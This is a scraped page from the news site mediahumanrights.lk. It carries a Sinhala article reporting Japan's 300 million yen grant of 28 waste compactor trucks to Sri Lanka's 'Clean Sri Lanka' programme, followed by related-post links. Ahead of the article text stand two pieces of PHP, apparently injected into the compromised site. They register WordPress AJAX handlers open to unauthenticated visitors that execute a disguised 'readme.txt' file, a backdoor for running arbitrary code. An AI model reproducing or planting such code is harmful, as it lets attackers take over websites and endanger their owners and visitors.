if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ජපානයෙන් ලංකාවට ලොකු ආධාරයක්.. - mediahumanrights.lk
mediahumanrights.lk
International News Local News News

ජපානයෙන් ලංකාවට ලොකු ආධාරයක්..

පිරිසිදු හා සෞඛ්‍ය සම්පන්න පරිසරයක් ගොඩනගා ගැනීම වෙනුවෙන් වූ ශ්‍රී ලංකා රජයේ කැපවීමට ජපාන රජයේ ත්‍යාගශීලී සහය මගින් විශාල දායකත්වයක් ලබා දී ඇත.

ඒ යටතේ ජපානයේ ආර්ථික හා සමාජ සංවර්ධන වැඩසටහන මගින් කසළ ප්‍රවාහනය සඳහා භාවිතා කරන නවීනතම කම්පැක්ටර් රථ 28 ක් ලබා ගැනීම සඳහා ජපන් යෙන් මිලියන 300 ක (ආසන්න වශයෙන් රුපියල් මිලියන 565ක) ප්‍රදානයක් ලබා දී ඇත.

මෙම ප්‍රදානය මගින් කසළ එකතු කිරීම සහ බැහැර කිරීම සඳහා වන ප්‍රයත්නය සැලකිය යුතු ලෙස වැඩි දියුණු කෙරෙන අතර රජයේ “Clean Sri Lanka” වැඩසටහනෙහි අභිලාෂය පරිදි රටේ භෞතික පරිසරය වඩාත් පිරිසිදු බවට පරිවර්තනය කිරීම, තිරසර භාවිතයන් හා යහ පුරුදු සඳහා වු ජාතික මට්ටමේ කැපවීම සහතික කෙරෙනු ඇත.

වේගවත් නාගරීකරණය හේතුවෙන් තීව්‍ර වී ඇති නීතිවිරෝධී කසළ බැහැර කිරීම සහ පරිසර දුෂණය ඇතුළු අභියෝග, අපද්‍රව්‍ය කළමනාකරණය තුළින් භෞතික පරිසරය පිරිසිදුව පවත්වා ගැනීම මගින් විසදා ගැනීමට “Clean Sri Lanka” වැඩසටහන මගින් අපේක්ෂා කරයි.

මෙම කසළ ප්‍රවාහනය සඳහා භාවිතා කරන නවීනතම කම්පැක්ටර් රථ ලබා දීම ශ්‍රී ලංකාවේ බස්නාහිර, උතුරු සහ නැගෙනහිර පළාත්වල පළාත් පාලන ආයතනවල අපද්‍රව්‍ය කළමනා කරණ පද්ධතියේ ධාරිතාව වැඩි දියුණු කිරීමේ හැකියාව වඩාත් ශක්තිමත් කරන අතර එතුළින් සියලුම පුරවැසියන්ට පිරිසිදු හා සෞඛ්‍ය සම්පන්න පරිසරයක් පවත්වා ගෙන යාමට ද හැකියාව ලැබේ.

ඉහත ප්‍රදානයට අදාළ හුවමාරු පත්‍ර සහ අනෙකුත් අදාළ ලියවිලි අත්සන් කිරීම 2025 පෙබරවාරි මස 03 වන දින ජනාධිපති කාර්යාලයේ දී සිදු කරන ලදී. ශ්‍රී ලංකා රජය වෙනුවෙන් මුදල්, ක්‍රම සම්පාදන සහ ආර්ථික සංවර්ධන අමාත්‍යාංශයේ ලේකම් කේ. එම්. මහින්ද සිරිවර්ධන මහතා සහ ජපාන රජය වෙනුවෙන් ශ්‍රී ලංකාවේ ජපාන තානාපති අතිගරු අකියෝ ඉසෝමතා මහතා විසින් අදාළ ලේඛන සඳහා අත්සන් කරන ලදී. මෙම අවස්ථාවට ශ්‍රී ලංකාවේ කම්කරු අමාත්‍ය හා ආර්ථික සංවර්ධන නියෝජ්‍ය අමාත්‍ය මහාචාර්ය අනිල් ජයන්ත ප්‍රනාන්දු මහතා සහ ජපානයේ විදේශ කටයුතු පිළිබඳ නියෝජ්‍ය අමාත්‍ය අකිකො ඉකුයිනා මහත්මිය ද සහභාගී විය.

මෙම ආධාරය ලබා දීම සම්බන්ධයෙන් ශ්‍රී ලංකා රජය, ජපාන රජය වෙත සිය කෘතඥතාව පළ කරන ලදී. මෙම සහයෝගීතාවය මගින් දෙරට අතර පවතින සබඳතාවය තවදුරටත් ශක්තිමත් වීම හා ශ්‍රී ලංකාවට වඩාත් පිරිසිදු හා තිරසාර අනාගතයක් සඳහා මහ සකස් කරනු ඇත.

Related posts

ශ‍්‍රී ලංකා කණ්ඩායම සුපිරි කණ්ඩායමක්.. තව ලකුණු 10-15ක් තිබුනා නම් පැරදුනු මැච් දෙකම දිනන්න තිබ්බා..

Shiran Viraj

යේමනයේ කොළරා වසංගතය පැතිරේ

Shiran Viraj

පහරදුන් අය හඳුනා ගැනීමට විදේශිකයින්ට අවස්ථාවක

Shiran Viraj